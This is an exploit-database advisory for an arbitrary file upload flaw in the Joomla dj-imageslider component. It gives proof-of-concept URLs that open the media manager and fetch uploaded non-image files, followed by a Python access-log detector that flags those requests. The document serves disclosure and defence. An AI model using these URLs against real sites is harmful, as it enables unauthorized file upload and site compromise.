# Exploit Title: [Joomla! Component dj-imageslider 3.2.3-3.1.0 - Arbitrary File Upload Vulnerability]
# Google Dork: [no]
# Date: [2018-06-05]
# Exploit Author: [41!kh4224rDz]
===========================================================================================================
# Vendor Homepage: [link]
#  Software Link: [https://dj-extensions.com/downloads/doc_download/82-dj-imageslider-aio-all-in-one-joomla-3x]  3.2.3
#  Software Link: [https://dj-extensions.com/downloads/doc_download/234-dj-imageslider-aio-all-in-one-joomla-25]  3.1.0   
======================================================================================================================
# Version: [3.2.3-3.1.0] 
# Tested on: [Win 7/Google chrome]

===========================================================================================================
#  POC: 

# Exploit:

# http://localhost/[PATH]/index.php?option=com_media&view=images&tmpl=component&fieldid=jform_image&e_name=&asset=com_djimageslider&author=&folder=

# For example:  site.com/[PATH]/index.php?option=com_media&view=images&tmpl=component&fieldid=jform_image&e_name=&asset=com_djimageslider&author=&folder=

# http://localhost/[PATH]/images/name.jpg

# http://localhost/[PATH]/images//name.txt
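
# Detection: an added example (not part of the original advisory or the vendor's code) that flags the requests listed above in a web server access log.
# Assumptions: "combined" access-log format, the image-extension allowlist, and the constructed sample log lines.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache/nginx "combined" access-log line (assumed format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

# Extensions treated as ordinary image content (assumed allowlist, tune per site).
IMAGE_EXTS = {"jpg", "jpeg", "png", "gif", "bmp", "webp", "ico"}

# Constructed sample lines (documentation IP ranges), not taken from a real server.
SAMPLE_LOG = [
    '203.0.113.7 - - [05/Jun/2018:10:00:01 +0000] "GET /joomla/index.php?option=com_media&view=images&tmpl=component&fieldid=jform_image&e_name=&asset=com_djimageslider&author=&folder= HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [05/Jun/2018:10:00:09 +0000] "GET /joomla/images//name.txt HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [05/Jun/2018:10:01:00 +0000] "GET /joomla/images/name.jpg HTTP/1.1" 200 20480 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [05/Jun/2018:10:02:00 +0000] "GET /joomla/index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]


def classify(line):
    """Return (ip, kind) for a suspicious log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    query = parse_qs(url.query, keep_blank_values=True)
    # Entry point from the advisory: com_media image view opened with asset=com_djimageslider.
    if (url.path.endswith("/index.php")
            and "com_media" in query.get("option", [])
            and "com_djimageslider" in query.get("asset", [])):
        return (m["ip"], "media-manager")
    # Successful fetch of a non-image file below /images/ (e.g. name.txt).
    segments = [s for s in url.path.split("/") if s]  # also collapses "images//name.txt"
    if m["status"] == "200" and "images" in segments[:-1]:
        name = segments[-1]
        ext = name.rpartition(".")[2].lower() if "." in name else ""
        if ext not in IMAGE_EXTS:
            return (m["ip"], "non-image-in-images")
    return None


def scan(lines):
    """Classify every line and keep only the hits, in log order."""
    return [hit for hit in map(classify, lines) if hit]


if __name__ == "__main__":
    for ip, kind in scan(SAMPLE_LOG):
        print(ip, kind)
```

# A "media-manager" hit followed by a "non-image-in-images" hit from the same client is the sequence worth reviewing first.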

===========================================================================================================

exploit-db, exploitalert, cxsecurity